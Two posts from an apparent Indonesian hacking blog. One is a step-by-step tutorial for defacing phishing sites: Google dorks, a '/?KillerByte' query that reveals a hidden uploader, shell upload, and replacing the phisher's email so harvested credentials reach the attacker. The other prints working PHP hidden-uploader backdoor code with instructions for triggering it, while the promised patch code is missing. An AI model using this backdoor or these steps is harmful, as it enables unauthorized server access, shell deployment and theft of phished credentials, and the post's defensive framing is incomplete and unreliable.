Tampilkan postingan dengan label Phising. Tampilkan semua postingan
Tampilkan postingan dengan label Phising. Tampilkan semua postingan

Jumat, 04 Maret 2016

Deface Website Phising dengan Hidden Uploader

Hallo fans .-. Nuenomaru disini.
xixihi, artikel pembukaan di bulan maret 2016 nih wkwkw.
Kali ini Nue akan Share Tutorial Deface Website Phising dengan Hidden Uploader.
Sebelumnya apa itu hidden uploader o.O ? bisa cek dipostingan Nue yang ini kak: WASPADA KALIAN YANG MEMPUNYAI CHECKER & PHISING ADA HIDDEN UPLOADER

gak semua website phesing *eh phising xD , bisa di pepes make teknik ini yak *perlu diInget xD .
kali ini Nue akan mempraktekan ke web phising PB Garena, itu loh yg org share dgn iming2 event dari pihak garena semacem cash/weapon permanen/dan lain2. *pinter2 soceng TS yang buat nih phising wkwkw.


Play with me, Baby ;*
foto hanya sebagai pemanis thread :3
Dork:

Garena site:.hol.es
Point Blank site:.esy.es
Cheat PB site:.hol.es
event PB Garena
(Kembangin dorknya, bisa ganti domainnya dgn domain hosting gratisan, gunakan imajinasi bokepers kalean ,gaes <(")  )

1. Dorking target, lalu pilih target yang mau di exploitasi


2. masukan exploit nya ke web target: /?KillerByte
contoh: www.target.co.li/?KillerByte


jika vuln, akan muncul letak hidden uploadernya ,gaes <(")

NB: Gak semua web phising, letak exploitnya di: /?KillerByte *jdi use your brain , br0 ..

3. jika muncul Uploader nya, langsung deh upload file yang mau ente upload bro

4. Akses file/shell nya di : www.target.co.li/fileygloupload
liat SS dibawah ini:

Done ~


Taraaa, Sukses kan ;)
Seterah deh mau diapain, mau di bedah ampe usus2 nya juga ,,,,,,,,,, *eh Dosa xD
gak usah ditebas indexnya, ganti e-mailnya aja jadi punya lo, biar result nya masuk ke gmail lo wkwkw.
Nue cuma Share doang yak, segala sesuatu ditanggung Pengguna ^^




Mudahkan o.O ?
Stay Cool and Keep ./Crotz , gaes :'v


Bonus: Hanya pemanis kak :')

bila ada kesalahan mohon di maafkan dan dibenarkan di kolom komentar kak. 
bila ada kritik, dan pertanyaan langsung aja kak ke wall fanspage kamiTKJ CYBER ART
Nue cuma niat untuk Share Tutorial, yg bertujuan utk membantu para pemula kek Nue :')

Happy Defaced ~
Sekian dan semoga bermanfaat .. terimakasih



thanks to Live targetnya Bang Mr.404 | Garooda Security Squad


./Nuenomaru
























Visit and follow :

FP         : TKJ Cyber Art
G+         TKJ Cyber Art
youtube : TKJ Cyber Art
BBM      : C0018D1A2

Minggu, 28 Februari 2016

WASPADA KALIAN YANG MEMPUNYAI CHECKER & PHISING ADA HIDDEN UPLOADER

Hallo fans .-. Nuenomaru disini .
cieelah dah lama gak posting, postingan sebelumnya di isi sama si Om OepilCore dan abang Calcune_System.
okeii kalii ini Nuenomaru akan bahas Tentang Script Hidden Uploader & Cara Patch nya .
sebenernya sih kasus web phising milik attacker, dan web checker milik para kardiman yang dari dlu alus2 aja eh tiba2 bisa di deface oleh depeser :v awkakwka.
yupz, itu karna sebagian dari mereka tak menyadari ada Hidden Uploader di web yang mereka buat :3 *entah itu hosting gratisan atau berbayar, tpi disalahsatu script trdapat hidden uploadernya.
cukup pembahasannya ;)

Lanjootz aja gans

apa itu hidden uploader? , hidden uploader adalah uploader tersembunyi. fungsi dari hidden uploader adalah sudah pasti untuk mengupload macam2 file termasuk juga backdoor/shell :D

<?php
if
(isset
(
$_REQUEST[$browser=$x=strlen("Chrome") . strlen("Mozila")]) && 
$_REQUEST[$x=strlen("Chrome") . strlen("Mozila")]=="browser")
{
echo "<h2></h2><hr>";
echo "<form action=\"\" method=\"post\" enctype=\"multipart/form-data\">
<label for=\"file\"></label>
<input type=\"file\" name=\"file\" id=\"file\" />
<br /><br />
<input type=\"submit\" name=\"default\" value=\"Upload\">
</form>";

{
move_uploaded_file($_FILES["file"]["tmp_name"],
"" . $_FILES["file"]["name"]);
echo "Rand(100-100): " . "" . $_FILES["file"]["name"];
echo"<hr>";
}
}
?> 

Cara menggunakan :
1. Copy script diatas.
2. Pastekan ke notepad dan save dengan format .php contoh : "hidden.php" dan simpan di localhost.

3. cara menjalankan script tersebut hidden.php?66=browser

penampakan hidden uploader :3


Lalu gimana cara patch nya x_O ????

penampakan source code sebelum di patch:


Biasanya kode itu oleh si pembuat checker di sisipkan di index.php maupun function.php. Saran saya adalah sebelum mengeshare checker sobat sebaiknya di delet itu hidden uploader soalnya sangat berbahaya! kalau sampek adat angan iseng nah anda lupa backup ancur hidup anda. nah atau dengan cara di patch seperti saya dengan menambahkan kode seperti ini:




Mudahkan o.O ?

Stay Cool and Keep ./Crotz , gaes :'v

Sekian tutorial sederhana di postingan ringan kali ini xixixhi.
sampai ketemu di next tutorial dgn Nue lagi ;)

bila ada kesalahan mohon di maafkan dan dibenarkan di kolom komentar kak. 
bila ada kritik, dan pertanyaan langsung aja kak ke wall fanspage kami: TKJ CYBER ART
Nue cuma niat untuk Share Tutorial, yg bertujuan utk membantu para pemula kek Nue :')

Happy patching~
Sekian dan semoga bermanfaat .. terimakasih




refrensi: touch me senpai :')




./Nuenomaru




Nuenomaru just an illusion in Cyber World




















Visit and follow :

FP         : TKJ Cyber Art
G+         TKJ Cyber Art
youtube : TKJ Cyber Art
BBM      : C0018D1A2
 

ande ande lumoet Template by Ipietoon Cute Blog Design